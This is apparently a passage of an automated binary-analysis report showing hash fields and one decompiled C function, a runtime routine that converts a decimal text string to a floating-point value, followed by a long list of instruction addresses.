                                                                                                                                                      • Opcode ID: 8005dc6ba0998565b83109a0b8f5c3e26b77b36a209bb3f8b293a8a77511ee85
                                                                                                                                                      • Instruction ID: e1ae51c1aaf66bcce95c14f3d3e403b9064ca1e152efad381cdf08257a0fb7e6
                                                                                                                                                      • Opcode Fuzzy Hash: 8005dc6ba0998565b83109a0b8f5c3e26b77b36a209bb3f8b293a8a77511ee85
                                                                                                                                                      • Instruction Fuzzy Hash: 16413570D092C9DEEB01CBA8C1587DEBFB16F16708F184088D5843B392C7BE1659CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 004093D5, Relevance: 26.7, Strings: 21, Instructions: 417COMMONCrypto
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                      			E004093D5(signed int* _a4, intOrPtr* _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28) {
				signed int _v8;
				char _v12;
				signed char* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v58;
				signed int _v62;
				signed int _v66;
				signed int _v68;
				char _v73;
				char _v96;
				signed int _t121;
				intOrPtr _t141;
				intOrPtr _t143;
				signed int _t146;
				intOrPtr* _t148;

				_t148 = _a12;
				_v16 =  &_v96;
				_t121 = 0;
				_t146 = 1;
				_v44 = 0;
				_v28 = _t146;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v36 = 0;
				_v48 = 0;
				_v52 = 0;
				_v32 = 0;
				_v12 = 0;
				_v24 = 0;
				_a12 = _t148;
				L1:
				_t143 =  *_t148;
				if(_t143 == 0x20 || _t143 == 9 || _t143 == 0xa || _t143 == 0xd) {
					_t148 = _t148 + 1;
					goto L1;
				}
				_push(4);
				while(1) {
					L7:
					_t141 =  *_t148;
					_t148 = _t148 + 1;
					if(_t121 > 0xb) {
						break;
					}
					switch( *((intOrPtr*)(_t121 * 4 +  &M00409876))) {
						case 0:
							__eflags = _t141 - 0x31;
							if(_t141 < 0x31) {
								L12:
								__eflags = _t141 -  *0x40ff24; // 0x2e
								if(__eflags != 0) {
									_t137 = _t141 - 0x2b;
									__eflags = _t137;
									if(_t137 == 0) {
										_v44 = _v44 & 0x00000000;
										_push(2);
										_pop(_t121);
										goto L7;
									}
									_t139 = _t137;
									__eflags = _t139;
									if(_t139 == 0) {
										_push(2);
										_v44 = 0x8000;
										_pop(_t121);
										goto L7;
									}
									__eflags = _t139 != 3;
									if(_t139 != 3) {
										goto L109;
									}
									goto L36;
								}
								goto L13;
							}
							__eflags = _t141 - 0x39;
							if(_t141 > 0x39) {
								goto L12;
							}
							goto L11;
						case 1:
							__eflags = __bl - 0x31;
							_v20 = __edx;
							if(__bl < 0x31) {
								L22:
								__eflags = __bl -  *0x40ff24; // 0x2e
								if(__eflags == 0) {
									goto L47;
								}
								__eflags = __bl - 0x2b;
								if(__bl == 0x2b) {
									goto L31;
								}
								__eflags = __bl - 0x2d;
								if(__bl == 0x2d) {
									goto L31;
								}
								__eflags = __bl - 0x30;
								if(__bl == 0x30) {
									goto L36;
								}
								goto L26;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								goto L11;
							}
							goto L22;
						case 2:
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								L34:
								__eflags = __bl -  *0x40ff24; // 0x2e
								if(__eflags == 0) {
									L13:
									_push(5);
									goto L90;
								}
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									goto L94;
								}
								L36:
								_t121 = _t146;
								goto L7;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								L11:
								_push(3);
								goto L81;
							}
							goto L34;
						case 3:
							_v20 = __edx;
							while(1) {
								__eflags =  *0x40ff20 - __edx; // 0x1
								if(__eflags <= 0) {
									__ecx =  *0x40fd10; // 0x40fd1a
									__eax = __bl & 0x000000ff;
									__eax = __bl & 0x000000ff & __esi;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E004075DB(__ecx, __esi, __bl & 0x000000ff, __esi);
									_pop(__ecx);
									_pop(__ecx);
									_push(1);
									_pop(__edx);
								}
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__eflags = _v8 - 0x19;
								if(_v8 >= 0x19) {
									_t31 =  &_v12;
									 *_t31 = _v12 + 1;
									__eflags =  *_t31;
								} else {
									__eax = _v16;
									_v8 = _v8 + 1;
									__bl = __bl - 0x30;
									_v16 =  &(_v16[1]);
									 *_v16 = __bl;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							__eflags = __bl -  *0x40ff24; // 0x2e
							if(__eflags != 0) {
								goto L58;
							}
							L47:
							__eax = __esi;
							goto L7;
						case 4:
							__eflags = _v8;
							_v20 = __edx;
							_v40 = __edx;
							if(_v8 != 0) {
								while(1) {
									L51:
									__eflags =  *0x40ff20 - __edx; // 0x1
									if(__eflags <= 0) {
										__ecx =  *0x40fd10; // 0x40fd1a
										__eax = __bl & 0x000000ff;
										__eax = __bl & 0x000000ff & __esi;
										__eflags = __eax;
									} else {
										__eax = __bl & 0x000000ff;
										__eax = E004075DB(__ecx, __esi, __bl & 0x000000ff, __esi);
										_pop(__ecx);
										_pop(__ecx);
										_push(1);
										_pop(__edx);
									}
									__eflags = __eax;
									if(__eax == 0) {
										break;
									}
									__eflags = _v8 - 0x19;
									if(_v8 < 0x19) {
										__eax = _v16;
										_v8 = _v8 + 1;
										__bl = __bl - 0x30;
										_v16 =  &(_v16[1]);
										_t46 =  &_v12;
										 *_t46 = _v12 - 1;
										__eflags =  *_t46;
										 *_v16 = __bl;
									}
									__bl =  *__edi;
									__edi = __edi + 1;
								}
								L58:
								__eflags = __bl - 0x2b;
								if(__bl == 0x2b) {
									L31:
									__edi = __edi - 1;
									_push(0xb);
									goto L90;
								}
								__eflags = __bl - 0x2d;
								if(__bl == 0x2d) {
									goto L31;
								}
								L26:
								__eflags = __bl - 0x43;
								if(__bl <= 0x43) {
									goto L109;
								}
								__eflags = __bl - 0x45;
								if(__bl <= 0x45) {
									L30:
									_push(6);
									goto L90;
								}
								__eflags = __bl - 0x63;
								if(__bl <= 0x63) {
									goto L109;
								}
								__eflags = __bl - 0x65;
								if(__bl > 0x65) {
									goto L109;
								}
								goto L30;
							} else {
								goto L49;
							}
							while(1) {
								L49:
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									goto L51;
								}
								_v12 = _v12 - 1;
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							goto L51;
						case 5:
							__eflags =  *0x40ff20 - __edx;
							_v40 = __edx;
							if( *0x40ff20 <= __edx) {
								__ecx =  *0x40fd10; // 0x40fd1a
								__eax = __bl & 0x000000ff;
								__eax = __bl & 0x000000ff & __esi;
								__eflags = __eax;
							} else {
								__eax = __bl & 0x000000ff;
								__eax = E004075DB(__ecx, __esi, __bl & 0x000000ff, __esi);
								_pop(__ecx);
								_pop(__ecx);
								_push(1);
								_pop(__edx);
							}
							__eflags = __eax;
							if(__eax == 0) {
								goto L94;
							} else {
								__eax = __esi;
								goto L82;
							}
						case 6:
							_t51 = __edi - 2; // 0x0
							__ecx = _t51;
							__eflags = __bl - 0x31;
							_a12 = __ecx;
							if(__bl < 0x31) {
								L68:
								__eax = __bl;
								__eax = __bl - 0x2b;
								__eflags = __eax;
								if(__eax == 0) {
									goto L89;
								}
								__eax = __eax - 1;
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L88;
								}
								__eax = __eax - 3;
								__eflags = __eax;
								if(__eax != 0) {
									goto L110;
								}
								goto L71;
							}
							__eflags = __bl - 0x39;
							if(__bl <= 0x39) {
								goto L80;
							}
							goto L68;
						case 7:
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								L83:
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									L94:
									__edi = _a12;
									goto L111;
								}
								L71:
								_push(8);
								goto L90;
							}
							__eflags = __bl - 0x39;
							if(__bl > 0x39) {
								goto L83;
							}
							goto L80;
						case 8:
							_v36 = __edx;
							while(1) {
								__eflags = __bl - 0x30;
								if(__bl != 0x30) {
									break;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							__eflags = __bl - 0x31;
							if(__bl < 0x31) {
								goto L109;
							}
							__eflags = __bl - 0x39;
							if(__bl > 0x39) {
								goto L109;
							}
							L80:
							_push(9);
							L81:
							_pop(_t121);
							L82:
							_t148 = _t148 - 1;
							goto L7;
						case 9:
							_v36 = 1;
							__esi = 0;
							__eflags = 0;
							while(1) {
								__eflags =  *0x40ff20 - 1;
								if( *0x40ff20 <= 1) {
									__ecx =  *0x40fd10; // 0x40fd1a
									__eax = __bl & 0x000000ff;
									__eax = __bl & 4;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E004075DB(__ecx, __esi, __bl & 0x000000ff, 4);
									_pop(__ecx);
									_pop(__ecx);
								}
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__ecx = __bl;
								_t66 = (__esi + __esi * 4) * 2; // -44
								__esi = __ecx + _t66 - 0x30;
								__eflags = __esi - 0x1450;
								if(__esi > 0x1450) {
									__esi = 0x1451;
									break;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							_v32 = __esi;
							while(1) {
								__eflags =  *0x40ff20 - 1;
								if( *0x40ff20 <= 1) {
									__ecx =  *0x40fd10; // 0x40fd1a
									__eax = __bl & 0x000000ff;
									__eax = __bl & 4;
									__eflags = __eax;
								} else {
									__eax = __bl & 0x000000ff;
									__eax = E004075DB(__ecx, __esi, __bl & 0x000000ff, 4);
									_pop(__ecx);
									_pop(__ecx);
								}
								__eflags = __eax;
								if(__eax == 0) {
									break;
								}
								__bl =  *__edi;
								__edi = __edi + 1;
							}
							L109:
							_t148 = _t148 - 1;
							goto L111;
						case 0xa:
							goto L92;
						case 0xb:
							__eflags = _a28;
							if(_a28 == 0) {
								_push(0xa);
								__edi = __edi - 1;
								__eflags = __edi;
								_pop(__eax);
								goto L92;
							}
							__eax = __bl;
							_t55 = __edi - 1; // 0x1
							__ecx = _t55;
							__eax = __bl - 0x2b;
							__eflags = __eax;
							_a12 = __ecx;
							if(__eax == 0) {
								L89:
								_push(7);
								L90:
								_pop(_t121);
								goto L7;
							}
							__eax = __eax - 1;
							__eax = __eax - 1;
							__eflags = __eax;
							if(__eax != 0) {
								L110:
								__edi = __ecx;
								L111:
								__eflags = _v20;
								 *_a8 = _t148;
								if(_v20 == 0) {
									_t147 = 0;
									_t123 = 0;
									_t150 = 0;
									_t142 = 0;
									_v24 = 4;
									L138:
									_t144 = _a4;
									_t124 = _t123 | _v44;
									__eflags = _t124;
									_t144[1] = _t150;
									_t144[0] = _t142;
									_t144[2] = _t124;
									 *_t144 = _t147;
									return _v24;
								}
								_push(0x18);
								_pop(_t126);
								__eflags = _v8 - _t126;
								if(_v8 <= _t126) {
									_t127 = _v16;
								} else {
									__eflags = _v73 - 5;
									if(_v73 >= 5) {
										_t75 =  &_v73;
										 *_t75 = _v73 + 1;
										__eflags =  *_t75;
									}
									_v8 = _t126;
									_t127 = _v16 - 1;
									_v12 = _v12 + 1;
								}
								__eflags = _v8;
								if(_v8 <= 0) {
									_t147 = 0;
									_t123 = 0;
									_t150 = 0;
									_t142 = 0;
									goto L129;
								} else {
									while(1) {
										_t127 = _t127 - 1;
										__eflags =  *_t127;
										if( *_t127 != 0) {
											break;
										}
										_v8 = _v8 - 1;
										_v12 = _v12 + 1;
									}
									E0040930E(_t148,  &_v96, _v8,  &_v68);
									_t131 = _v32;
									__eflags = _v28;
									if(_v28 < 0) {
										_t131 =  ~_t131;
									}
									_t132 = _t131 + _v12;
									__eflags = _v36;
									if(_v36 == 0) {
										_t132 = _t132 + _a20;
										__eflags = _t132;
									}
									__eflags = _v40;
									if(_v40 == 0) {
										_t132 = _t132 - _a24;
										__eflags = _t132;
									}
									__eflags = _t132 - 0x1450;
									if(_t132 <= 0x1450) {
										__eflags = _t132 - 0xffffebb0;
										if(_t132 >= 0xffffebb0) {
											E0040A0AC( &_v68, _t132, _a16);
											_t147 = _v68;
											_t142 = _v66;
											_t150 = _v62;
											_t123 = _v58;
											goto L129;
										}
										_v52 = 1;
										goto L128;
									} else {
										_v48 = 1;
										L128:
										_t142 = _a12;
										_t150 = _a12;
										_t123 = _a12;
										_t147 = _a12;
										L129:
										__eflags = _v48;
										if(_v48 == 0) {
											__eflags = _v52;
											if(_v52 != 0) {
												_t147 = 0;
												_t123 = 0;
												_t150 = 0;
												_t142 = 0;
												__eflags = 0;
												_v24 = 1;
											}
										} else {
											_t142 = 0;
											_t123 = 0x7fff;
											_t150 = 0x80000000;
											_t147 = 0;
											_v24 = 2;
										}
										goto L138;
									}
								}
							}
							L88:
							_v28 = _v28 | 0xffffffff;
							_push(7);
							_pop(__eax);
							goto L7;
					}
				}
				L92:
				if(_t121 == 0xa) {
					goto L111;
				}
				goto L7;
			}


























                                                                                                                                                      0x004093de
                                                                                                                                                      0x004093e6
                                                                                                                                                      0x004093e9
                                                                                                                                                      0x004093eb
                                                                                                                                                      0x004093ec
                                                                                                                                                      0x004093ef
                                                                                                                                                      0x004093f2
                                                                                                                                                      0x004093f5
                                                                                                                                                      0x004093f8
                                                                                                                                                      0x004093fb
                                                                                                                                                      0x004093fe
                                                                                                                                                      0x00409401
                                                                                                                                                      0x00409404
                                                                                                                                                      0x00409407
                                                                                                                                                      0x0040940a
                                                                                                                                                      0x0040940d
                                                                                                                                                      0x00409410
                                                                                                                                                      0x00409410
                                                                                                                                                      0x00409415
                                                                                                                                                      0x00409426
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409426
                                                                                                                                                      0x00409429
                                                                                                                                                      0x0040942c
                                                                                                                                                      0x0040942c
                                                                                                                                                      0x0040942c
                                                                                                                                                      0x0040942e
                                                                                                                                                      0x00409432
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409438
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040943f
                                                                                                                                                      0x00409442
                                                                                                                                                      0x00409450
                                                                                                                                                      0x00409450
                                                                                                                                                      0x00409456
                                                                                                                                                      0x00409462
                                                                                                                                                      0x00409462
                                                                                                                                                      0x00409465
                                                                                                                                                      0x00409485
                                                                                                                                                      0x00409489
                                                                                                                                                      0x0040948b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040948b
                                                                                                                                                      0x00409468
                                                                                                                                                      0x00409468
                                                                                                                                                      0x00409469
                                                                                                                                                      0x00409479
                                                                                                                                                      0x0040947b
                                                                                                                                                      0x00409482
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409482
                                                                                                                                                      0x0040946b
                                                                                                                                                      0x0040946e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409474
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409456
                                                                                                                                                      0x00409444
                                                                                                                                                      0x00409447
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040948e
                                                                                                                                                      0x00409491
                                                                                                                                                      0x00409494
                                                                                                                                                      0x0040949b
                                                                                                                                                      0x0040949b
                                                                                                                                                      0x004094a1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094a7
                                                                                                                                                      0x004094aa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094ac
                                                                                                                                                      0x004094af
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094b1
                                                                                                                                                      0x004094b4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094b4
                                                                                                                                                      0x00409496
                                                                                                                                                      0x00409499
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094e5
                                                                                                                                                      0x004094e8
                                                                                                                                                      0x004094f3
                                                                                                                                                      0x004094f3
                                                                                                                                                      0x004094f9
                                                                                                                                                      0x00409458
                                                                                                                                                      0x00409458
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409458
                                                                                                                                                      0x004094ff
                                                                                                                                                      0x00409502
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409508
                                                                                                                                                      0x00409508
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409508
                                                                                                                                                      0x004094ea
                                                                                                                                                      0x004094ed
                                                                                                                                                      0x00409449
                                                                                                                                                      0x00409449
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409449
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040950f
                                                                                                                                                      0x00409512
                                                                                                                                                      0x00409512
                                                                                                                                                      0x00409518
                                                                                                                                                      0x0040952b
                                                                                                                                                      0x00409531
                                                                                                                                                      0x00409537
                                                                                                                                                      0x00409537
                                                                                                                                                      0x0040951a
                                                                                                                                                      0x0040951a
                                                                                                                                                      0x0040951f
                                                                                                                                                      0x00409524
                                                                                                                                                      0x00409525
                                                                                                                                                      0x00409526
                                                                                                                                                      0x00409528
                                                                                                                                                      0x00409528
                                                                                                                                                      0x00409539
                                                                                                                                                      0x0040953b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040953d
                                                                                                                                                      0x00409541
                                                                                                                                                      0x00409553
                                                                                                                                                      0x00409553
                                                                                                                                                      0x00409553
                                                                                                                                                      0x00409543
                                                                                                                                                      0x00409543
                                                                                                                                                      0x00409546
                                                                                                                                                      0x00409549
                                                                                                                                                      0x0040954c
                                                                                                                                                      0x0040954f
                                                                                                                                                      0x0040954f
                                                                                                                                                      0x00409556
                                                                                                                                                      0x00409558
                                                                                                                                                      0x00409558
                                                                                                                                                      0x0040955b
                                                                                                                                                      0x00409561
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409563
                                                                                                                                                      0x00409563
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040956a
                                                                                                                                                      0x0040956e
                                                                                                                                                      0x00409571
                                                                                                                                                      0x00409574
                                                                                                                                                      0x00409583
                                                                                                                                                      0x00409583
                                                                                                                                                      0x00409583
                                                                                                                                                      0x00409589
                                                                                                                                                      0x0040959c
                                                                                                                                                      0x004095a2
                                                                                                                                                      0x004095a8
                                                                                                                                                      0x004095a8
                                                                                                                                                      0x0040958b
                                                                                                                                                      0x0040958b
                                                                                                                                                      0x00409590
                                                                                                                                                      0x00409595
                                                                                                                                                      0x00409596
                                                                                                                                                      0x00409597
                                                                                                                                                      0x00409599
                                                                                                                                                      0x00409599
                                                                                                                                                      0x004095aa
                                                                                                                                                      0x004095ac
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004095ae
                                                                                                                                                      0x004095b2
                                                                                                                                                      0x004095b4
                                                                                                                                                      0x004095b7
                                                                                                                                                      0x004095ba
                                                                                                                                                      0x004095bd
                                                                                                                                                      0x004095c0
                                                                                                                                                      0x004095c0
                                                                                                                                                      0x004095c0
                                                                                                                                                      0x004095c3
                                                                                                                                                      0x004095c3
                                                                                                                                                      0x004095c5
                                                                                                                                                      0x004095c7
                                                                                                                                                      0x004095c7
                                                                                                                                                      0x004095ca
                                                                                                                                                      0x004095ca
                                                                                                                                                      0x004095cd
                                                                                                                                                      0x004094dd
                                                                                                                                                      0x004094dd
                                                                                                                                                      0x004094de
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094de
                                                                                                                                                      0x004095d3
                                                                                                                                                      0x004095d6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094b6
                                                                                                                                                      0x004094b6
                                                                                                                                                      0x004094b9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094bf
                                                                                                                                                      0x004094c2
                                                                                                                                                      0x004094d6
                                                                                                                                                      0x004094d6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094d6
                                                                                                                                                      0x004094c4
                                                                                                                                                      0x004094c7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094cd
                                                                                                                                                      0x004094d0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409576
                                                                                                                                                      0x00409576
                                                                                                                                                      0x00409576
                                                                                                                                                      0x00409579
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040957b
                                                                                                                                                      0x0040957e
                                                                                                                                                      0x00409580
                                                                                                                                                      0x00409580
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004095e1
                                                                                                                                                      0x004095e7
                                                                                                                                                      0x004095ea
                                                                                                                                                      0x004095fd
                                                                                                                                                      0x00409603
                                                                                                                                                      0x00409609
                                                                                                                                                      0x00409609
                                                                                                                                                      0x004095ec
                                                                                                                                                      0x004095ec
                                                                                                                                                      0x004095f1
                                                                                                                                                      0x004095f6
                                                                                                                                                      0x004095f7
                                                                                                                                                      0x004095f8
                                                                                                                                                      0x004095fa
                                                                                                                                                      0x004095fa
                                                                                                                                                      0x0040960b
                                                                                                                                                      0x0040960d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409613
                                                                                                                                                      0x00409613
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409613
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409617
                                                                                                                                                      0x00409617
                                                                                                                                                      0x0040961a
                                                                                                                                                      0x0040961d
                                                                                                                                                      0x00409620
                                                                                                                                                      0x00409627
                                                                                                                                                      0x00409627
                                                                                                                                                      0x0040962a
                                                                                                                                                      0x0040962a
                                                                                                                                                      0x0040962d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040962f
                                                                                                                                                      0x00409630
                                                                                                                                                      0x00409630
                                                                                                                                                      0x00409631
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409633
                                                                                                                                                      0x00409633
                                                                                                                                                      0x00409636
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409636
                                                                                                                                                      0x00409622
                                                                                                                                                      0x00409625
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409661
                                                                                                                                                      0x00409664
                                                                                                                                                      0x00409674
                                                                                                                                                      0x00409674
                                                                                                                                                      0x00409677
                                                                                                                                                      0x004096bd
                                                                                                                                                      0x004096bd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004096bd
                                                                                                                                                      0x0040963c
                                                                                                                                                      0x0040963c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040963c
                                                                                                                                                      0x00409666
                                                                                                                                                      0x00409669
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409640
                                                                                                                                                      0x00409643
                                                                                                                                                      0x00409643
                                                                                                                                                      0x00409646
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409648
                                                                                                                                                      0x0040964a
                                                                                                                                                      0x0040964a
                                                                                                                                                      0x0040964d
                                                                                                                                                      0x00409650
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409656
                                                                                                                                                      0x00409659
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040966b
                                                                                                                                                      0x0040966b
                                                                                                                                                      0x0040966d
                                                                                                                                                      0x0040966d
                                                                                                                                                      0x0040966e
                                                                                                                                                      0x0040966e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004096c5
                                                                                                                                                      0x004096cc
                                                                                                                                                      0x004096cc
                                                                                                                                                      0x004096ce
                                                                                                                                                      0x004096ce
                                                                                                                                                      0x004096d5
                                                                                                                                                      0x004096e6
                                                                                                                                                      0x004096ec
                                                                                                                                                      0x004096f2
                                                                                                                                                      0x004096f2
                                                                                                                                                      0x004096d7
                                                                                                                                                      0x004096d7
                                                                                                                                                      0x004096dd
                                                                                                                                                      0x004096e2
                                                                                                                                                      0x004096e3
                                                                                                                                                      0x004096e3
                                                                                                                                                      0x004096f5
                                                                                                                                                      0x004096f7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004096f9
                                                                                                                                                      0x004096ff
                                                                                                                                                      0x004096ff
                                                                                                                                                      0x00409703
                                                                                                                                                      0x00409709
                                                                                                                                                      0x00409710
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409710
                                                                                                                                                      0x0040970b
                                                                                                                                                      0x0040970d
                                                                                                                                                      0x0040970d
                                                                                                                                                      0x00409715
                                                                                                                                                      0x00409718
                                                                                                                                                      0x00409718
                                                                                                                                                      0x0040971f
                                                                                                                                                      0x00409730
                                                                                                                                                      0x00409736
                                                                                                                                                      0x0040973c
                                                                                                                                                      0x0040973c
                                                                                                                                                      0x00409721
                                                                                                                                                      0x00409721
                                                                                                                                                      0x00409727
                                                                                                                                                      0x0040972c
                                                                                                                                                      0x0040972d
                                                                                                                                                      0x0040972d
                                                                                                                                                      0x0040973f
                                                                                                                                                      0x00409741
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409743
                                                                                                                                                      0x00409745
                                                                                                                                                      0x00409745
                                                                                                                                                      0x00409748
                                                                                                                                                      0x00409748
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040967b
                                                                                                                                                      0x0040967f
                                                                                                                                                      0x004096ab
                                                                                                                                                      0x004096ad
                                                                                                                                                      0x004096ad
                                                                                                                                                      0x004096ae
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004096ae
                                                                                                                                                      0x00409681
                                                                                                                                                      0x00409684
                                                                                                                                                      0x00409684
                                                                                                                                                      0x00409687
                                                                                                                                                      0x00409687
                                                                                                                                                      0x0040968a
                                                                                                                                                      0x0040968d
                                                                                                                                                      0x004096a3
                                                                                                                                                      0x004096a3
                                                                                                                                                      0x004096a5
                                                                                                                                                      0x004096a5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004096a5
                                                                                                                                                      0x0040968f
                                                                                                                                                      0x00409690
                                                                                                                                                      0x00409690
                                                                                                                                                      0x00409691
                                                                                                                                                      0x0040974b
                                                                                                                                                      0x0040974b
                                                                                                                                                      0x0040974d
                                                                                                                                                      0x00409750
                                                                                                                                                      0x00409754
                                                                                                                                                      0x00409756
                                                                                                                                                      0x00409835
                                                                                                                                                      0x00409837
                                                                                                                                                      0x00409839
                                                                                                                                                      0x0040983b
                                                                                                                                                      0x0040983d
                                                                                                                                                      0x0040985b
                                                                                                                                                      0x0040985b
                                                                                                                                                      0x0040985e
                                                                                                                                                      0x0040985e
                                                                                                                                                      0x00409862
                                                                                                                                                      0x00409865
                                                                                                                                                      0x00409868
                                                                                                                                                      0x00409870
                                                                                                                                                      0x00409875
                                                                                                                                                      0x00409875
                                                                                                                                                      0x0040975c
                                                                                                                                                      0x0040975e
                                                                                                                                                      0x0040975f
                                                                                                                                                      0x00409762
                                                                                                                                                      0x00409779
                                                                                                                                                      0x00409764
                                                                                                                                                      0x00409764
                                                                                                                                                      0x00409768
                                                                                                                                                      0x0040976a
                                                                                                                                                      0x0040976a
                                                                                                                                                      0x0040976a
                                                                                                                                                      0x0040976a
                                                                                                                                                      0x0040976d
                                                                                                                                                      0x00409773
                                                                                                                                                      0x00409774
                                                                                                                                                      0x00409774
                                                                                                                                                      0x0040977c
                                                                                                                                                      0x00409780
                                                                                                                                                      0x0040982b
                                                                                                                                                      0x0040982d
                                                                                                                                                      0x0040982f
                                                                                                                                                      0x00409831
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409786
                                                                                                                                                      0x00409786
                                                                                                                                                      0x00409786
                                                                                                                                                      0x00409787
                                                                                                                                                      0x0040978a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040978c
                                                                                                                                                      0x0040978f
                                                                                                                                                      0x0040978f
                                                                                                                                                      0x0040979f
                                                                                                                                                      0x004097a4
                                                                                                                                                      0x004097ac
                                                                                                                                                      0x004097af
                                                                                                                                                      0x004097b1
                                                                                                                                                      0x004097b1
                                                                                                                                                      0x004097b3
                                                                                                                                                      0x004097b6
                                                                                                                                                      0x004097b9
                                                                                                                                                      0x004097bb
                                                                                                                                                      0x004097bb
                                                                                                                                                      0x004097bb
                                                                                                                                                      0x004097be
                                                                                                                                                      0x004097c1
                                                                                                                                                      0x004097c3
                                                                                                                                                      0x004097c3
                                                                                                                                                      0x004097c3
                                                                                                                                                      0x004097c6
                                                                                                                                                      0x004097cb
                                                                                                                                                      0x004097fd
                                                                                                                                                      0x00409802
                                                                                                                                                      0x00409815
                                                                                                                                                      0x0040981a
                                                                                                                                                      0x0040981d
                                                                                                                                                      0x00409820
                                                                                                                                                      0x00409823
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409826
